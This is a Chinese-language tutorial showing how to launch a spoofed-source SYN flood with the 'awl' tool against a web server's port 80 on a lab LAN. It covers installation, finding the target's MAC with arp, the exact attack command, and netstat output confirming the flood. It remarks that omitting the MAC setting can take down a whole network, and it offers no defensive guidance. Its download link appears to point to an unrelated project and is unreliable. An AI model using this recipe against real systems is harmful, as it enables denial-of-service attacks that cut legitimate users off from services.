利用tcp三次握手,使用awl伪装MAC地址进行多线程SYN洪水攻击
SYN洪水攻击概述:
SYN洪水攻击主要源于: tcp协议的三次握手机制
tcp协议面向链接的协议
SYN洪水攻击的过程:
在服务端返回一个确认的SYN-ACK包的时候有个潜在的弊端,如果发起的客户是一个不存在的客户端,那么服务端就不会接到客户端回应的ACK包
这时服务端需要耗费一定的数量的系统内存来等待这个未决的连接,直到等待超关闭时间,才能施放内存
如果恶意者通过通过ip欺骗,发送大量SYN包给受害者系统,导致服务端存在大量未决的连接并占用大量内存和tcp连接,从而导致正常客户端无法访问服务端,这就是SYN洪水攻击的过程
在客户机上安装awl软件进行攻击
下载地址:
https://gitlab.com/davical-project/awl/tags
上传到linux系统中
开始安装awl
[root@DaMoWang ~]# tar xf awl-0.2.tar.gz -C /usr/src/ [root@DaMoWang ~]# cd /usr/src/awl-0.2/ [root@DaMoWang awl-0.2]# ./configure && make -j 4 && make install [root@DaMoWang awl-0.2]# which awl /usr/local/bin/awl
awl伪装MAC地址进行多线程SYN攻击 > 获取对方的IP地址解析成MAC地址
[root@DaMoWang ~]# arp -n Address HWtype HWaddress Flags Mask Iface 192.168.94.1 ether 00:50:56:c0:00:08 C ens33 192.168.94.2 ether 00:50:56:f9:bc:19 C ens33 [root@DaMoWang ~]# ping 192.168.94.29 [root@DaMoWang ~]# arp -n Address HWtype HWaddress Flags Mask Iface 192.168.94.29 ether 00:0c:29:7d:b5:99 C ens33 192.168.94.1 ether 00:50:56:c0:00:08 C ens33 192.168.94.2 ether 00:50:56:f9:bc:19 C ens33
awl参数如下:
-i 发送包的接口
-m 指定目标mac地址 注:如果-m没有指定mac,默认目标MAC地址是“FF.FF.FF.FF.FF.FF”,
这表示向同一网段内的所有主机发出ARP广播,进行SYN攻击,还容易使整个局域网瘫痪
-d 被攻击机器的IP
-p 被攻击机器的端口
# 查看被攻击前的wab服务器80端口 [root@server ~]# netstat -antup|grep :80 tcp6 0 0 :::80 :::* LISTEN 1750/httpd
开始攻击:
# 测试攻击三秒 [root@DaMoWang ~]# awl -i ens33 -m 00:0c:29:7d:b5:99 -d 192.168.94.29 -p 80
#攻击效果:
#在server上查看:发现很多伪装成公网的IP在攻击我们
[root@server ~]# netstat -antup|grep :80 tcp 0 0 192.168.94.29:80 252.60.102.53:3310 SYN_RECV - tcp 0 0 192.168.94.29:80 250.167.218.42:54569 SYN_RECV - tcp 0 0 192.168.94.29:80 245.241.14.61:48316 SYN_RECV - tcp 0 0 192.168.94.29:80 246.144.13.20:33828 SYN_RECV - tcp 0 0 192.168.94.29:80 250.221.131.26:56896 SYN_RECV - tcp 0 0 192.168.94.29:80 245.222.184.94:46875 SYN_RECV - tcp 0 0 192.168.94.29:80 241.98.121.43:13190 SYN_RECV - tcp 0 0 192.168.94.29:80 250.5.25.10:43506 SYN_RECV - tcp 0 0 192.168.94.29:80 247.23.128.105:46118 SYN_RECV - tcp 0 0 192.168.94.29:80 251.126.27.89:11781 SYN_RECV - tcp 0 0 192.168.94.29:80 241.51.26.67:3393 SYN_RECV - tcp 0 0 192.168.94.29:80 255.103.18.1:13774 SYN_RECV - tcp 0 0 192.168.94.29:80 254.239.94.37:5561 SYN_RECV - tcp 0 0 192.168.94.29:80 243.180.7.100:24802 SYN_RECV - tcp 0 0 192.168.94.29:80 253.170.6.21:26871 SYN_RECV - tcp 0 0 192.168.94.29:80 247.92.108.56:25729 SYN_RECV - tcp 0 0 192.168.94.29:80 248.187.73.6:24181 SYN_RECV -
[root@server ~]# netstat -antup|grep :80 |wc -l
121
#三秒钟 一百多次攻击
--求知若饥 虚心若愚